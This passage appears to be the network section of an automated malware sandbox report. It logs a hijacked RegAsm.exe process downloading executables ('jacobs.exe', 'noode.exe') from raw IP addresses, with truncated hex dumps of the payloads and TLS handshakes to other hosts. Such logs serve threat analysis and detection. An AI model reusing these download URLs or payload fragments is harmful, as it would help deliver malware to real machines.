                                                                                                                                                                                                                                Data Ascii: ***",*0*0*0+*"+*0*&0*0*0*0*0*0*0*
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.491359949 CEST1236INData Raw: 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 16 2a 00 00 00 12 00 00 16 2a 00 00 00 1a 28 5b 3c 00 06 2a 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 13 30 04 00 04 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: ******([<*0*0*********"*0*"*0*"*0*"
                                                                                                                                                                                                                                Sep 21, 2024 13:33:44.857687950 CEST219OUTGET /lopsa/66ea645129e6a_jacobs.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 147.45.44.104
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:45.044715881 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:44 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 11496960
                                                                                                                                                                                                                                Last-Modified: Wed, 18 Sep 2024 05:25:37 GMT
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Keep-Alive: timeout=120
                                                                                                                                                                                                                                ETag: "66ea6451-af6e00"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 ad 2b dd 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 5d 70 fd 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 a8 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 d1 fd 00 3c 00 00 00 00 50 a5 01 d8 04 03 00 40 16 a5 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 46 00 01 28 00 00 00 00 15 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEd+f#]p@` <P@`*F(8 .text6 `.rdata@@.data@.pdata@@.00cfg@@.tls@.text0p- `.text1X@.text2`b`h.rsrcPh@@


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.949711176.111.174.109806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.186645985 CEST197OUTHEAD /kurwa HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 176.111.174.109
                                                                                                                                                                                                                                Cache-Control: no-cache


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.949712176.113.115.33806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.188874006 CEST207OUTHEAD /thebig/noode.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 176.113.115.33
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.109224081 CEST377INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.14.1
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 3129722
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=noode.exe
                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.110887051 CEST206OUTGET /thebig/noode.exe HTTP/1.1
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: 176.113.115.33
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479156971 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.14.1
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                Content-Length: 3129722
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Content-Description: File Transfer
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=noode.exe
                                                                                                                                                                                                                                Content-Transfer-Encoding: binary
                                                                                                                                                                                                                                Expires: 0
                                                                                                                                                                                                                                Cache-Control: must-revalidate
                                                                                                                                                                                                                                Pragma: public
                                                                                                                                                                                                                                Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*F@@@P,CODE0 `DATAP@BSS.idataP@.tls.rdata@P.reloc@P.rsrc,,@P@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479193926 CEST1236INData Raw: 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: @Pstring<@m@)@(@(@)@$)@Free0)@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479211092 CEST1236INData Raw: 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 3c c4 40 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 00 00
                                                                                                                                                                                                                                Data Ascii: SVW}sjh Vj;t#<@luhjP3_^[SVWUCjh hU;usjh VU;t#<@uhjPb3]_^[SVWUL$$D$
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479227066 CEST672INData Raw: c4 40 00 e8 95 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 ce 19 40 00 64 ff 32 64 89 22 68 1c c4 40 00 e8 39 f9 ff ff 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 2e f9 ff ff b8 3c c4 40 00 e8 8c f9 ff ff b8 4c c4 40 00
                                                                                                                                                                                                                                Data Ascii: @3_^[U3Uh@d2d"h@9=2@th@.<@L@x@xhjt@=t@t/t@3L@=u\@@h@@3ZYYdh@=2@th@)@]US=@3Uh@d
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479244947 CEST1236INData Raw: c0 04 e8 ca ff ff ff c3 83 fa 04 7c 0a 8b ca 81 c9 02 00 00 80 89 08 03 c2 83 20 fe c3 53 56 8b d0 83 ea 04 8b 12 8b ca 81 e1 02 00 00 80 81 f9 02 00 00 80 74 0a c7 05 18 c4 40 00 04 00 00 00 8b da 81 e3 fc ff ff 7f 2b c3 8b c8 33 11 f7 c2 fe ff
                                                                                                                                                                                                                                Data Ascii: | SVt@+3t@t r+;pt@^[@SVW3t%uhF#_^[SVWUkC7++
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479262114 CEST1236INData Raw: 7c 86 f4 eb 26 8b f3 85 f6 79 03 83 c6 03 c1 fe 02 8b 3d 74 c4 40 00 89 44 b7 f4 8b 32 89 75 f8 8b 75 f8 89 46 04 8b 75 f8 89 30 8b c1 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 fc c3 40 00 83 eb 04 01 1d 00 c4 40 00 e8 8e 0e 00 00 e9 84 00
                                                                                                                                                                                                                                Data Ascii: |&y=t@D2uuFu0RE@@;l@J)l@=l@}l@3l@p@p@E@@92E3ZYYdhO!@=2@th@5E_^[YY]@UQSVW3
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479278088 CEST1236INData Raw: 12 8b c8 8b d7 8b c3 e8 2d 01 00 00 8b c3 e8 fe fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 89 25 40 00 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 fb ec ff ff c3 e9 75 08 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8b c0 85 c0 74 0a ff 15 04 b0 40
                                                                                                                                                                                                                                Data Ascii: -}3ZYYdh%@=2@th@uE_^[Y]t@tjt@uRt2tP@Yt.@utP@Yt@@tZH=&@y"
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479298115 CEST1236INData Raw: 1a eb eb b5 00 8a 5c 0e 06 32 1c 0a 80 e3 df 75 ee 49 75 f1 8b 46 02 5f 5e 5b c3 8b c0 53 56 57 89 cf 31 db 31 c9 8b 70 dc 85 f6 74 13 66 8b 0e 83 c6 02 3b 56 02 74 13 66 8b 1e 01 de 49 75 f3 8b 40 ec 85 c0 75 df 88 07 eb 0a 83 c6 06 31 c9 8a 0e
                                                                                                                                                                                                                                Data Ascii: \2uIuF_^[SVW11ptf;VtfIu@u1A_^[SVW11Pptf>N8ttOu@uZN\2uIuZ_^[RQSP1L$diA*@Ad[YZD$,@&R=@
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479496002 CEST1236INData Raw: 04 fd 81 38 ce fa ed 0e 74 0d 8b 42 08 e8 1f fa ff ff e8 02 fc ff ff 31 c0 83 c4 14 64 8b 10 59 8b 12 89 11 5d 5f 5e 5b b8 01 00 00 00 c3 8d 40 00 e8 2b 02 00 00 8b 90 00 00 00 00 8b 0a 89 88 00 00 00 00 8b 42 08 e8 e5 f9 ff ff 5a 8b 64 24 2c 31
                                                                                                                                                                                                                                Data Ascii: 8tB1dY]_^[@+BZd$,1YdX]{1L$D$d$@UU=,t\=tW-t\-t=HtN`q?r6t0R=t=-t.HtHt$:-t/=t&,*&"
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.479517937 CEST552INData Raw: 4a 75 f2 e8 85 fe ff ff 50 89 c6 8b 44 9c 14 89 f2 85 c0 74 0a 8b 48 fc 01 ce e8 9e f2 ff ff 4b 75 e9 5a 58 85 d2 74 03 ff 4a f8 e8 f1 fd ff ff 5a 5e 5b 58 8d 24 94 ff e0 c3 8d 40 00 85 c0 74 09 8b 50 f8 42 7e 03 89 50 f8 c3 8b c0 85 c0 74 02 c3
                                                                                                                                                                                                                                Data Ascii: JuPDtHKuZXtJZ^[X$@tPB~Pt4@t+JIt%SBHI|HH6[St-Xt&J|9})|9D$1D$[tVSVWURtRO}19~k
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.522274017 CEST1236INData Raw: 89 d8 03 5c 2e 02 89 f2 e8 58 ff ff ff 4f 7f f0 5d 5f 5e 5b c3 b9 01 00 00 00 e9 6e ff ff ff c3 90 53 56 57 55 81 c4 00 f8 ff ff 8b f1 8b da 8b f8 85 db 75 09 8b c6 e8 6d fb ff ff eb 61 81 fb 00 04 00 00 7d 26 6a 00 6a 00 68 00 08 00 00 8d 44 24
                                                                                                                                                                                                                                Data Ascii: \.XO]_^[nSVWUuma}&jjhD$PSWjj3jjjjSWjj3jjUPSWjj]_^[@SVS]^[SVWU) =}+hD


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.949713162.241.61.218806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.194776058 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee af 13 ca a0 68 d5 52 53 4d 43 a7 e0 7b b9 0e 92 1d 4a e8 15 00 f1 cc 55 58 67 ce 43 56 52 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                Data Ascii: fhRSMC{JUXgCVR&,+0/$#('=<5/Qnerv.com.pe#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.702334881 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.949714162.241.61.218806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.194885015 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee af 13 3e cb 41 37 ef ed a1 c5 ab 1d 2c 75 0a a5 1d 85 be 9c 6d 16 a9 08 f4 a0 60 6d 63 dc 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                Data Ascii: f>A7,um`mc&,+0/$#('=<5/Qnerv.com.pe#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.679855108 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.949715185.166.143.50806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.199032068 CEST171OUTData Raw: 16 03 03 00 a6 01 00 00 a2 03 03 66 ee af 13 19 43 af 7c 20 ca 83 88 09 28 08 78 27 0c fd c7 2b f4 a8 54 19 65 f9 6e 70 6c be 18 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                Data Ascii: fC| (x'+Tenpl&,+0/$#('=<5/Sbitbucket.org#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.834928989 CEST156INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                content-length: 11
                                                                                                                                                                                                                                content-type: text/plain
                                                                                                                                                                                                                                date: Sat, 21 Sep 2024 11:33:40 GMT
                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                connection: close
                                                                                                                                                                                                                                Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                Data Ascii: Bad Request


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.949716162.241.61.218806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.687426090 CEST169OUTData Raw: 16 03 03 00 a4 01 00 00 a0 03 03 66 ee af 13 2d 00 cb 0b 8e 11 1c ba a5 5e 59 e3 9c cb 45 fd cf 47 25 3e be 1c 1a 38 1a 8a fb 1a 00 00 26 c0 2c c0 2b c0 30 c0 2f c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c 00 35 00 2f
                                                                                                                                                                                                                                Data Ascii: f-^YEG%>8&,+0/$#('=<5/Qnerv.com.pe#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.192723989 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.949717162.241.61.218806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.708254099 CEST115OUTData Raw: 16 03 01 00 6e 01 00 00 6a 03 01 66 ee af 13 2a 8b b9 a7 6f ca 64 51 69 b8 0e 97 41 f8 92 fe 60 44 5d 8f f5 c1 8f 53 c0 c5 3e 7e 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 33 00 00 00 10 00 0e 00 00 0b 6e 65 72 76 2e 63 6f 6d 2e
                                                                                                                                                                                                                                Data Ascii: njf*odQiA`D]S>~5/3nerv.com.pe#
                                                                                                                                                                                                                                Sep 21, 2024 13:33:41.202763081 CEST513INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                Date: Sat, 21 Sep 2024 11:33:41 GMT
                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                Content-Length: 347
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                11192.168.2.949718185.166.143.50806388C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Sep 21, 2024 13:33:40.842003107 CEST117OUTData Raw: 16 03 01 00 70 01 00 00 6c 03 01 66 ee af 14 c9 ee 94 41 1e a5 da 43 08 fa f4 6a 1a a5 2a 42 fa 54 3f 42 bd c1 9d 6b df 22 77 ee 00 00 0e c0 0a c0 09 c0 14 c0 13 00 35 00 2f 00 0a 01 00 00 35 00 00 00 12 00 10 00 00 0d 62 69 74 62 75 63 6b 65 74
